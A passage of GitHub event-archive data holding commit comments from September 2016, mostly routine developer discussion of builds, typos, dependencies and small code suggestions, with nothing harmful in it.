fresh@0.2.4\r\n| | +-- ms@0.7.0\r\n| | +-- on-finished@2.2.1\r\n| | | `-- ee-first@1.1.0\r\n| | `-- range-parser@1.0.3\r\n| +-- serve-waterfall@1.1.1\r\n| | `-- send@0.11.1\r\n| |   +-- debug@2.1.3\r\n| |   +-- depd@1.0.1\r\n| |   +-- destroy@1.0.3\r\n| |   +-- escape-html@1.0.1\r\n| |   +-- etag@1.5.1\r\n| |   +-- fresh@0.2.4\r\n| |   +-- ms@0.7.0\r\n| |   +-- on-finished@2.2.1\r\n| |   | `-- ee-first@1.1.0\r\n| |   `-- range-parser@1.0.3\r\n| +-- sinon@1.17.5\r\n| | +-- formatio@1.1.1\r\n| | +-- lolex@1.3.2\r\n| | `-- samsam@1.1.2\r\n| +-- sinon-chai@2.8.0\r\n| +-- stacky@1.3.1\r\n| | `-- lodash@3.10.1\r\n| +-- test-fixture@1.1.1 (git://github.com/polymerelements/test-fixture.git#05514d6f32ade6fe54de5b242bbb43ea9dcff3c0)\r\n| +-- wct-local@2.0.11\r\n| | +-- @types/chalk@0.4.28\r\n| | +-- @types/express@4.0.32\r\n| | | +-- @types/express-serve-static-core@4.0.33\r\n| | | | `-- @types/node@6.0.38\r\n| | | `-- @types/serve-static@1.7.30\r\n| | |   `-- @types/mime@0.0.28\r\n| | +-- @types/freeport@1.0.19\r\n| | +-- @types/node@6.0.38\r\n| | +-- @types/which@1.0.27\r\n| | +-- freeport@1.0.5\r\n| | +-- launchpad@0.5.3\r\n| | | +-- async@1.5.2\r\n| | | +-- browserstack@1.5.0\r\n| | | | `-- https-proxy-agent@1.0.0\r\n| | | |   `-- agent-base@2.0.1\r\n| | | |     `-- semver@5.0.3\r\n| | | +-- plist@1.2.0\r\n| | | | +-- base64-js@0.0.8\r\n| | | | +-- xmlbuilder@4.0.0\r\n| | | | | `-- lodash@3.10.1\r\n| | | | `-- xmldom@0.1.22\r\n| | | +-- restify@4.1.1\r\n| | | | +-- backoff@2.5.0\r\n| | | | | `-- precond@0.2.3\r\n| | | | +-- bunyan@1.8.1\r\n| | | | | +-- moment@2.14.1\r\n| | | | | +-- mv@2.1.1\r\n| | | | | | +-- ncp@2.0.0\r\n| | | | | | `-- rimraf@2.4.5\r\n| | | | | |   `-- glob@6.0.4\r\n| | | | | `-- safe-json-stringify@1.0.3\r\n| | | | +-- csv@0.4.6\r\n| | | | | +-- csv-generate@0.0.6\r\n| | | | | +-- csv-parse@1.1.7\r\n| | | | | +-- csv-stringify@0.0.8\r\n| | | | | `-- stream-transform@0.1.1\r\n| | | | +-- dtrace-provider@0.6.0\r\n| | | | | `-- nan@2.4.0\r\n| | | | +-- escape-regexp-component@1.0.2\r\n| | | | +-- formidable@1.0.17\r\n| | | | +-- http-signature@0.11.0\r\n| | | | +-- keep-alive-agent@0.0.1\r\n| | | | +-- lru-cache@4.0.1\r\n| | | | | +-- pseudomap@1.0.2\r\n| | | | | `-- yallist@2.0.0\r\n| | | | +-- qs@3.1.0\r\n| | | | +-- spdy@3.4.0\r\n| | | | | +-- handle-thing@1.2.5\r\n| | | | | +-- http-deceiver@1.2.7\r\n| | | | | +-- select-hose@2.0.0\r\n| | | | | `-- spdy-transport@2.0.14\r\n| | | | |   +-- hpack.js@2.1.4\r\n| | | | |   | `-- readable-stream@2.1.5\r\n| | | | |   |   `-- isarray@1.0.0\r\n| | | | |   +-- obuf@1.1.1\r\n| | | | |   +-- readable-stream@2.1.5\r\n| | | | |   | `-- isarray@1.0.0\r\n| | | | |   `-- wbuf@1.7.2\r\n| | | | +-- vasync@1.6.3\r\n| | | | | `-- verror@1.6.0\r\n| | | | |   `-- extsprintf@1.2.0\r\n| | | | `-- verror@1.8.1\r\n| | | |   +-- assert-plus@1.0.0\r\n| | | |   `-- extsprintf@1.3.0\r\n| | | `-- underscore@1.8.3\r\n| | +-- selenium-standalone@5.6.2\r\n| | | +-- async@1.2.1\r\n| | | +-- commander@2.6.0\r\n| | | +-- lodash@3.9.3\r\n| | | +-- minimist@1.1.0\r\n| | | +-- mkdirp@0.5.0\r\n| | | | `-- minimist@0.0.8\r\n| | | +-- urijs@1.16.1\r\n| | | +-- which@1.1.1\r\n| | | | `-- is-absolute@0.1.7\r\n| | | |   `-- is-relative@0.1.3\r\n| | | `-- yauzl@2.6.0\r\n| | |   `-- fd-slicer@1.0.1\r\n| | |     `-- pend@1.2.0\r\n| | `-- which@1.2.11\r\n| |   `-- isexe@1.1.2\r\n| +-- wct-sauce@1.8.4\r\n| | +-- lodash@3.10.1\r\n| | +-- request@2.74.0\r\n| | | +-- aws-sign2@0.6.0\r\n| | | +-- bl@1.1.2\r\n| | | | `-- readable-stream@2.0.6\r\n| | | |   `-- isarray@1.0.0\r\n| | | +-- caseless@0.11.0\r\n| | | +-- combined-stream@1.0.5\r\n| | | | `-- delayed-stream@1.0.0\r\n| | | +-- forever-agent@0.6.1\r\n| | | +-- form-data@1.0.1\r\n| | | | `-- async@2.0.1\r\n| | | |   `-- lodash@4.15.0\r\n| | | +-- hawk@3.1.3\r\n| | | | +-- boom@2.10.1\r\n| | | | +-- cryptiles@2.0.5\r\n| | | | +-- hoek@2.16.3\r\n| | | | `-- sntp@1.0.9\r\n| | | +-- http-signature@1.1.1\r\n| | | | `-- assert-plus@0.2.0\r\n| | | +-- mime-types@2.1.11\r\n| | | | `-- mime-db@1.23.0\r\n| | | +-- oauth-sign@0.8.2\r\n| | | `-- qs@6.2.1\r\n| | +-- sauce-connect-launcher@0.14.0\r\n| | | +-- adm-zip@0.4.7\r\n| | | +-- async@1.4.0\r\n| | | +-- lodash@3.10.1\r\n| | | `-- rimraf@2.4.3\r\n| | |   `-- glob@5.0.15\r\n| | +-- temp@0.8.3\r\n| | | `-- rimraf@2.2.8\r\n| | `-- uuid@2.0.2\r\n| `-- wd@0.3.12\r\n|   +-- archiver@0.14.4\r\n|   | +-- async@0.9.2\r\n|   | +-- buffer-crc32@0.2.5\r\n|   | +-- glob@4.3.5\r\n|   | | `-- minimatch@2.0.10\r\n|   | +-- lazystream@0.1.0\r\n|   | +-- lodash@3.2.0\r\n|   | +-- tar-stream@1.1.5\r\n|   | | `-- end-of-stream@1.1.0\r\n|   | `-- zip-stream@0.5.2\r\n|   |   +-- compress-commons@0.2.9\r\n|   |   | +-- crc32-stream@0.3.4\r\n|   |   | `-- node-int64@0.3.3\r\n|   |   `-- lodash@3.2.0\r\n|   +-- async@1.0.0\r\n|   +-- lodash@3.9.3\r\n|   +-- q@1.4.1\r\n|   +-- request@2.55.0\r\n|   | +-- caseless@0.9.0\r\n|   | +-- forever-agent@0.6.1\r\n|   | +-- har-validator@1.8.0\r\n|   | | +-- bluebird@2.11.0\r\n|   | | `-- commander@2.9.0\r\n|   | +-- hawk@2.3.1\r\n|   | | +-- boom@2.10.1\r\n|   | | +-- cryptiles@2.0.5\r\n|   | | +-- hoek@2.16.3\r\n|   | | `-- sntp@1.0.9\r\n|   | +-- oauth-sign@0.6.0\r\n|   | `-- qs@2.4.2\r\n|   +-- underscore.string@3.0.3\r\n|   `-- vargs@0.1.0\r\n`-- winston@2.2.0\r\n  +-- async@1.0.0\r\n  +-- colors@1.0.3\r\n  +-- cycle@1.0.3\r\n  +-- eyes@0.1.8\r\n  +-- isstream@0.1.2\r\n  +-- pkginfo@0.3.1\r\n  `-- stack-trace@0.0.9\r\n\r\nnpm ERR! extraneous: brfs@1.4.3 C:\\Users\\Nigel\\Desktop\\envoy-polymer\\node_modules\\brfs\r\n\r\n@klarkc and my terminal truncated some "}},"created_at":"2016-09-08T16:26:29Z"}
{"id":"4535149146","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18947959,"position":20,"line":71,"path":"test/components/urlBarSuggestionsTest.js","commit_id":"7edc0ce9c9079c9b8f165fa0a6add38abc827de8","created_at":"2016-09-08T16:27:02Z","updated_at":"2016-09-08T16:27:02Z","body":"agree, we can just pull in the file. That repo hasn't changed in years anyway"}},"created_at":"2016-09-08T16:27:02Z"}
{"id":"4535151273","type":"CommitCommentEvent","actor":{"login":"cgpeter96"},"repo":{"name":"cgpeter96/peter_py"},"payload":{"comment":{"id":18947971,"position":2,"line":2,"path":"README.md","commit_id":"5234f2b42db60576b5b9c66ea4fa8db131df46cc","created_at":"2016-09-08T16:27:24Z","updated_at":"2016-09-08T16:27:24Z","body":"纯属娱乐"}},"created_at":"2016-09-08T16:27:24Z"}
{"id":"4535151816","type":"CommitCommentEvent","actor":{"login":"lucaswerkmeister"},"repo":{"name":"ceylon/ceylon.ast"},"payload":{"comment":{"id":18947975,"position":null,"line":null,"path":null,"commit_id":"21ca57376fff6d4e06a3ffc85d6b3d52da44faf3","created_at":"2016-09-08T16:27:30Z","updated_at":"2016-09-08T16:27:30Z","body":"I pushed a new version."}},"created_at":"2016-09-08T16:27:30Z"}
{"id":"4535154586","type":"CommitCommentEvent","actor":{"login":"tabatkins"},"repo":{"name":"tabatkins/bikeshed"},"payload":{"comment":{"id":18948032,"position":16,"line":599,"path":"bikeshed/__init__.py","commit_id":"82c85ec257d20430690eb03d0cb88aa83f96bdde","created_at":"2016-09-08T16:28:01Z","updated_at":"2016-09-08T16:28:01Z","body":"Yeah, that works for me. I was just copy/pasting the CSSWG bits over, and pattern-matched your code against mine. Fixing."}},"created_at":"2016-09-08T16:28:01Z"}
{"id":"4535159434","type":"CommitCommentEvent","actor":{"login":"schonmann"},"repo":{"name":"schonmann/EDL"},"payload":{"comment":{"id":18948055,"position":null,"line":null,"path":null,"commit_id":"588cab99cb340970e528b4c373457eda48893c05","created_at":"2016-09-08T16:28:54Z","updated_at":"2016-09-08T16:28:54Z","body":"Ele joga algum erro ou simplesmente não abre? Mais tarde quando chegar em casa vou commitar o tratamento de colisões e ver se deixei algo pendente, talvez algum arquivo de som faltando. Valeu Professor!"}},"created_at":"2016-09-08T16:28:54Z"}
{"id":"4535161660","type":"CommitCommentEvent","actor":{"login":"IkerCelorrio"},"repo":{"name":"mgravell/fast-member"},"payload":{"comment":{"id":18948066,"position":9,"line":127,"path":"FastMember/MemberSet.cs","commit_id":"4a40b3bbde99f5076101e5c4ee0db1003614ef3f","created_at":"2016-09-08T16:29:17Z","updated_at":"2016-09-08T16:29:17Z","body":"The parameter name would be ```inherit``` instead of ```Inhirit```, right?\r\n```// typo+coding style ... ```\r\n\r\n"}},"created_at":"2016-09-08T16:29:17Z"}
{"id":"4535162052","type":"CommitCommentEvent","actor":{"login":"PhantomAssassin12"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18948067,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-08T16:29:21Z","updated_at":"2016-09-08T16:29:21Z","body":"btw I getting status 7 error when I install it did I need to modify it?"}},"created_at":"2016-09-08T16:29:21Z"}
{"id":"4535165357","type":"CommitCommentEvent","actor":{"login":"mdeuser"},"repo":{"name":"nwspeete-ibm/openwhisk"},"payload":{"comment":{"id":18948072,"position":1,"line":1,"path":"services/restify/Dockerfile","commit_id":"bb4f2f1dd570f1f706ac1fc6ca2556f96c9ffb9d","created_at":"2016-09-08T16:29:55Z","updated_at":"2016-09-08T16:29:55Z","body":"@nwspeete-ibm - Is this an older version of this file?  In recent files, I am seeing `FROM scala`... "}},"created_at":"2016-09-08T16:29:55Z"}
{"id":"4535170796","type":"CommitCommentEvent","actor":{"login":"jamadden"},"repo":{"name":"zopefoundation/zodbdocs"},"payload":{"comment":{"id":18948082,"position":16,"line":195,"path":"documentation/reference/storages.rst","commit_id":"edbf0628995dd3e590c1af8d48e6287d2c84f5ba","created_at":"2016-09-08T16:30:46Z","updated_at":"2016-09-08T16:30:46Z","body":"provided -> provides"}},"created_at":"2016-09-08T16:30:46Z"}
{"id":"4535172480","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"schonmann/EDL"},"payload":{"comment":{"id":18948086,"position":null,"line":null,"path":null,"commit_id":"588cab99cb340970e528b4c373457eda48893c05","created_at":"2016-09-08T16:31:03Z","updated_at":"2016-09-08T16:31:03Z","body":"Dá um erro, mas não lembro qual.\r\nQuando você der um novo commit, eu testo novamente..."}},"created_at":"2016-09-08T16:31:03Z"}
{"id":"4535174879","type":"CommitCommentEvent","actor":{"login":"Alex-Keyes"},"repo":{"name":"kamyu104/LeetCode"},"payload":{"comment":{"id":18948093,"position":null,"line":null,"path":null,"commit_id":"997b0490555370799dd4c75a1aaae01b1456953b","created_at":"2016-09-08T16:31:27Z","updated_at":"2016-09-08T16:31:27Z","body":"Kamyu, how are you so active in this repo?  Is this all you do?!"}},"created_at":"2016-09-08T16:31:27Z"}
{"id":"4535175782","type":"CommitCommentEvent","actor":{"login":"klarkc"},"repo":{"name":"klarkc/polymer-loopback-starter-kit"},"payload":{"comment":{"id":18948094,"position":null,"line":null,"path":null,"commit_id":"662ac70082b5bb06e44bb8fe1f0f52605a2af2a0","created_at":"2016-09-08T16:31:36Z","updated_at":"2016-09-08T16:31:36Z","body":"@Nigeltiany that winston is not in our package.json, try remove it: `$ npm uninstall winston`"}},"created_at":"2016-09-08T16:31:36Z"}
{"id":"4535176239","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"B--B/Alucard-Kernel-jfltexx"},"payload":{"comment":{"id":18948097,"position":null,"line":null,"path":null,"commit_id":"3f6a972d1dca5084855788bcef363b3494fa9c8f","created_at":"2016-09-08T16:31:41Z","updated_at":"2016-09-08T16:31:41Z","body":"hey mate : )\r\nI saw that CM guys added sdcardfs driver to their stock kernel too: https://www.cmxlog.com/13/jfltexx/ (build 20160908) ...do i have to merge their changes and revert yours?\r\n\r\nAfter enabling the sdcardfs from device tree,i had some random freezes/reboots \r\nalthough i dont know if its caused from sdcardfs or something else i merged.did u test it on aosp ? "}},"created_at":"2016-09-08T16:31:41Z"}
{"id":"4535176697","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/chorus"},"payload":{"comment":{"id":18948099,"position":null,"line":null,"path":null,"commit_id":"d475f2bf8839ccbb75f187127965b976a88563e9","created_at":"2016-09-08T16:31:46Z","updated_at":"2016-09-08T16:31:46Z","body":"TeamCity Chorus :: chorus-win32-master Continuous [Build 2.6.264.d475f2bf8839ccbb75f187127965b976a88563e9](http://build.palaso.org/viewLog.html?buildId=76655&buildTypeId=bt2) outcome was **SUCCESS**\nSummary: Tests passed: 949, ignored: 50 Build time: 00:27:23"}},"created_at":"2016-09-08T16:31:46Z"}
{"id":"4535177187","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":18948101,"position":null,"line":null,"path":null,"commit_id":"12047b0cd2e0cf9e445e140492048452828f8606","created_at":"2016-09-08T16:31:51Z","updated_at":"2016-09-08T16:31:51Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/32414/testReport/) for this commit**"}},"created_at":"2016-09-08T16:31:51Z"}
{"id":"4535177659","type":"CommitCommentEvent","actor":{"login":"mhmeadows63"},"repo":{"name":"grongor/knock"},"payload":{"comment":{"id":18948104,"position":null,"line":null,"path":null,"commit_id":"d4d76bec1911ad16cd6148344cd8399a41490fba","created_at":"2016-09-08T16:31:56Z","updated_at":"2016-09-08T16:31:56Z","body":"Retested - ok"}},"created_at":"2016-09-08T16:31:56Z"}
{"id":"4535181476","type":"CommitCommentEvent","actor":{"login":"tjhei"},"repo":{"name":"dealii/dealii"},"payload":{"comment":{"id":18948108,"position":17,"line":70,"path":"source/distributed/tria_base.cc","commit_id":"4123a86394191ff82681e5c8935245179c28415f","created_at":"2016-09-08T16:32:38Z","updated_at":"2016-09-08T16:32:38Z","body":"That would work, but I would prefer a function ``MPI::delete_communicator()`` to be in line with ``duplicate_communicator``."}},"created_at":"2016-09-08T16:32:38Z"}
{"id":"4535183593","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18948116,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-08T16:33:02Z","updated_at":"2016-09-08T16:33:02Z","body":"What recovery are you using? Use TWRP (my modified version).\r\n[twrp2.img.zip](https://github.com/ngoquang2708/android_device_samsung_vivalto3gvn/files/462135/twrp2.img.zip)\r\n"}},"created_at":"2016-09-08T16:33:02Z"}
{"id":"4535186327","type":"CommitCommentEvent","actor":{"login":"bangerth"},"repo":{"name":"dealii/dealii"},"payload":{"comment":{"id":18948122,"position":17,"line":70,"path":"source/distributed/tria_base.cc","commit_id":"4123a86394191ff82681e5c8935245179c28415f","created_at":"2016-09-08T16:33:33Z","updated_at":"2016-09-08T16:33:33Z","body":"Or just use the preprocessor. "}},"created_at":"2016-09-08T16:33:33Z"}
{"id":"4535188791","type":"CommitCommentEvent","actor":{"login":"tamiko"},"repo":{"name":"dealii/dealii"},"payload":{"comment":{"id":18948131,"position":17,"line":70,"path":"source/distributed/tria_base.cc","commit_id":"4123a86394191ff82681e5c8935245179c28415f","created_at":"2016-09-08T16:34:00Z","updated_at":"2016-09-08T16:34:00Z","body":"-> #3083 "}},"created_at":"2016-09-08T16:34:00Z"}
{"id":"4535191033","type":"CommitCommentEvent","actor":{"login":"greg-db"},"repo":{"name":"dropbox/dropbox-sdk-js"},"payload":{"comment":{"id":18948135,"position":11,"line":10,"path":"src/rpc-request.js","commit_id":"e1e440737964736511b1126840d6bf41b5dc50fc","created_at":"2016-09-08T16:34:23Z","updated_at":"2016-09-08T16:34:23Z","body":"@ulion Can you [open an issue](https://github.com/dropbox/dropbox-sdk-js/issues/new) for this, and including the steps and sample code to reproduce it, and the full error you're getting? Thanks in advance! "}},"created_at":"2016-09-08T16:34:23Z"}
{"id":"4535191985","type":"CommitCommentEvent","actor":{"login":"javipacheco"},"repo":{"name":"47deg/sbt-microsites"},"payload":{"comment":{"id":18948138,"position":1,"line":89,"path":"README.md","commit_id":"a8084dfd10030b8f0581cdc1056d2eeb8eaad6b0","created_at":"2016-09-08T16:34:33Z","updated_at":"2016-09-08T16:34:33Z","body":"Fui a la iluminación no"}},"created_at":"2016-09-08T16:34:33Z"}
{"id":"4535194988","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18948143,"position":null,"line":null,"path":null,"commit_id":"9cfc0410a8eab450e0bed5f5739a310648762fff","created_at":"2016-09-08T16:35:05Z","updated_at":"2016-09-08T16:35:05Z","body":"I was thinking around 2 pm or 2:30 pm CST. That should give me enough time to build the mudpack if you have the files ready to go."}},"created_at":"2016-09-08T16:35:05Z"}
{"id":"4535197167","type":"CommitCommentEvent","actor":{"login":"PhantomAssassin12"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18948150,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-08T16:35:31Z","updated_at":"2016-09-08T16:35:31Z","body":"I used the clevior TWRP I will try yours :+1: "}},"created_at":"2016-09-08T16:35:31Z"}
{"id":"4535199840","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18948160,"position":null,"line":null,"path":null,"commit_id":"14dd34fbe65fea88a6a0fd1f3c8d9d1d932bbdb6","created_at":"2016-09-08T16:35:56Z","updated_at":"2016-09-08T16:35:56Z","body":"TeamCity libpalaso :: palaso-win32-master Continuous [Build 3.0.764.14dd34fbe65fea88a6a0fd1f3c8d9d1d932bbdb6](http://build.palaso.org/viewLog.html?buildId=76667&buildTypeId=bt223) outcome was **SUCCESS**\nSummary: Tests passed: 3490, ignored: 126 Build time: 00:04:10"}},"created_at":"2016-09-08T16:35:56Z"}
{"id":"4535202781","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18948174,"position":null,"line":null,"path":null,"commit_id":"9cfc0410a8eab450e0bed5f5739a310648762fff","created_at":"2016-09-08T16:36:27Z","updated_at":"2016-09-08T16:36:27Z","body":"That sounds fine. I'll upload the files in a little bit so that you have what you need. I merged all relevant changes above as well."}},"created_at":"2016-09-08T16:36:27Z"}
{"id":"4535206388","type":"CommitCommentEvent","actor":{"login":"PhantomAssassin12"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18948197,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-08T16:37:09Z","updated_at":"2016-09-08T16:37:09Z","body":"I will Flash it using odin or using the TWRP(clevior)?"}},"created_at":"2016-09-08T16:37:09Z"}
{"id":"4535207809","type":"CommitCommentEvent","actor":{"login":"albertoleal"},"repo":{"name":"cloudfoundry/grootfs"},"payload":{"comment":{"id":18948204,"position":null,"line":null,"path":null,"commit_id":"93840563b825d9fb594184a5489bdc77e3328cb2","created_at":"2016-09-08T16:37:24Z","updated_at":"2016-09-08T16:37:24Z","body":"@glestaris Yes, you're right. This story handles only when downloading a layer fails, we have another story to address the unpack issue: https://www.pivotaltracker.com/story/show/129443419"}},"created_at":"2016-09-08T16:37:24Z"}
{"id":"4535208345","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18948206,"position":null,"line":null,"path":null,"commit_id":"e3493048c2074816763d52d443799cd0f6e40c04","created_at":"2016-09-08T16:37:29Z","updated_at":"2016-09-08T16:37:29Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=64)"}},"created_at":"2016-09-08T16:37:29Z"}
{"id":"4535208369","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18948207,"position":null,"line":null,"path":null,"commit_id":"f9a280f36e0e275b24c7868d0b1573c4ceea1433","created_at":"2016-09-08T16:37:29Z","updated_at":"2016-09-08T16:37:29Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=64)"}},"created_at":"2016-09-08T16:37:29Z"}
{"id":"4535208424","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18948209,"position":null,"line":null,"path":null,"commit_id":"ece0a574a00f3193cc4ca76c724901edc6d86590","created_at":"2016-09-08T16:37:30Z","updated_at":"2016-09-08T16:37:30Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=64)"}},"created_at":"2016-09-08T16:37:30Z"}
{"id":"4535209582","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18948218,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-08T16:37:42Z","updated_at":"2016-09-08T16:37:42Z","body":"Any of them.\n\n2016-09-08 23:37 GMT+07:00 PhantomAssassin12 <notifications@github.com>:\n\n> I will Flash it using odin or using the TWRP(clevior)?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ngoquang2708/android_device_samsung_vivalto3gvn/commit/bb12130b3135fc21f31bf639dc595ac6ca1addc6#commitcomment-18948197>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJOl9nrsdct3XxjMTGL3dbwthhH4LPq2ks5qoDm1gaJpZM4J4Cgx>\n> .\n>\n"}},"created_at":"2016-09-08T16:37:42Z"}
{"id":"4535210090","type":"CommitCommentEvent","actor":{"login":"albertoleal"},"repo":{"name":"cloudfoundry/grootfs"},"payload":{"comment":{"id":18948219,"position":13,"line":46,"path":"store/cache_driver/cache_driver.go","commit_id":"93840563b825d9fb594184a5489bdc77e3328cb2","created_at":"2016-09-08T16:37:49Z","updated_at":"2016-09-08T16:37:49Z","body":"Wow, nice catch! Gonna change that.."}},"created_at":"2016-09-08T16:37:49Z"}
{"id":"4535210994","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18948223,"position":null,"line":null,"path":null,"commit_id":"9cfc0410a8eab450e0bed5f5739a310648762fff","created_at":"2016-09-08T16:37:59Z","updated_at":"2016-09-08T16:37:59Z","body":"Sounds good!"}},"created_at":"2016-09-08T16:37:59Z"}
{"id":"4535211867","type":"CommitCommentEvent","actor":{"login":"taphu"},"repo":{"name":"taphu/scotty-format"},"payload":{"comment":{"id":18948229,"position":37,"line":26,"path":"src/Web/Scotty/Format/Trans.hs","commit_id":"49a7f9fd313977ec8cd9d985b6831514a92a6965","created_at":"2016-09-08T16:38:10Z","updated_at":"2016-09-08T16:38:10Z","body":"RFC-2616 states:\r\n\r\n> If no Accept header field is present, then it is assumed that the client accepts all media types.\r\n\r\nThis looks like `406 Not Acceptable` will be returned instead? Usually the easiest way to deal with this is something like:\r\n```haskell\r\nacceptValue <- fromMaybe \"*/* <$> header \"Accept\"\r\n```"}},"created_at":"2016-09-08T16:38:10Z"}
{"id":"4535212002","type":"CommitCommentEvent","actor":{"login":"belerophon"},"repo":{"name":"ShiftForward/adstax-sdk-scala"},"payload":{"comment":{"id":18948231,"position":null,"line":null,"path":null,"commit_id":"85cc512306534385273d6da272f2a5f6284e78b7","created_at":"2016-09-08T16:38:12Z","updated_at":"2016-09-08T16:38:12Z","body":"This seems ok now!"}},"created_at":"2016-09-08T16:38:12Z"}
{"id":"4535214999","type":"CommitCommentEvent","actor":{"login":"creator23"},"repo":{"name":"ccle/moodle-mod_questionnaire"},"payload":{"comment":{"id":18948241,"position":9,"line":63,"path":"db/access.php","commit_id":"14eb86aa6cdca91f9c8aec37ee0d7224d1c80be9","created_at":"2016-09-08T16:38:44Z","updated_at":"2016-09-08T16:38:44Z","body":"@dannyjung90 this was not my formatting. This was an old core edit, simply copied in as it was. And by moodle standards, all inline comments must end with punctuation."}},"created_at":"2016-09-08T16:38:44Z"}
{"id":"4535215014","type":"CommitCommentEvent","actor":{"login":"gr2m"},"repo":{"name":"Rookies-RGSOC2016/Riot.js-Learning"},"payload":{"comment":{"id":18948242,"position":8,"line":6,"path":"tags/apps-container.tag","commit_id":"875bea46a3d60d666dfce2b68963b615e48c6b84","created_at":"2016-09-08T16:38:45Z","updated_at":"2016-09-08T16:38:45Z","body":"The `<a>` tag must look something like this `<a href=\"#/my-hoodie-route\">click me</a>`\r\n\r\nand then you can define a route like this\r\n\r\n```js\r\nvar hoodieRoute = riot.route.create() \r\nhoodieRoute('/my-hoodie-route',function(){\r\n  console.log('route: dashboard')\r\n  self.show = true\r\n  self.update()\r\n  renderAppList()\r\n  return\r\n})\r\n```\r\n\r\nThe part after `#` in `href=\"#/my-hoodie-route\"` and the first argument of `hoodieRoute` must be the same. Can you give that a try?"}},"created_at":"2016-09-08T16:38:45Z"}
{"id":"4535215527","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18948243,"position":null,"line":null,"path":null,"commit_id":"17756adf04e7fe945b03204c8bbd3c89fc6cefdb","created_at":"2016-09-08T16:38:51Z","updated_at":"2016-09-08T16:38:51Z","body":"os_2_0_develop (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-17756adf04e7fe945b03204c8bbd3c89fc6cefdb-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-17756adf04e7fe945b03204c8bbd3c89fc6cefdb-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-08T16:38:51Z"}
{"id":"4535217595","type":"CommitCommentEvent","actor":{"login":"scottmor10"},"repo":{"name":"scottmor10/fin-der"},"payload":{"comment":{"id":18948246,"position":1,"line":1,"path":"README.md","commit_id":"39359db0a73d36166815346eacc44c2f035c03c6","created_at":"2016-09-08T16:39:14Z","updated_at":"2016-09-08T16:39:14Z","body":"import pynder\r\n\r\nFBID = \"YOUR_FB_ID\"\r\nFBTOKEN= \"YOUR_FB_TOKEN\"\r\n\r\nsession = pynder.Session(FBID, FBTOKEN)\r\nfriends = session.get_fb_friends()\r\n\r\n# Print the names of all facebook friends using Tinder Social.\r\nprint(\", \".join([x.name for x in friends]))\r\n\r\n# Get the user_info of these facebook friends.\r\nuser_info_objects = []\r\nfor friend in friends:\r\n    user_info_objects.append(friend.get_tinder_information())\r\n\r\n# Print the bios.\r\nfor user_info, friend in zip(user_info_objects, friends):\r\n    print(\"=\" * 50)\r\n    # Use Friend.name, as user_info.name only contains first name.\r\n    print(friend.name)\r\n    print(friend.facebook_link)\r\n    print(\"-\" * 50)\r\n    print(user_info.bio)\r\n    print(\"=\" * 50)"}},"created_at":"2016-09-08T16:39:14Z"}
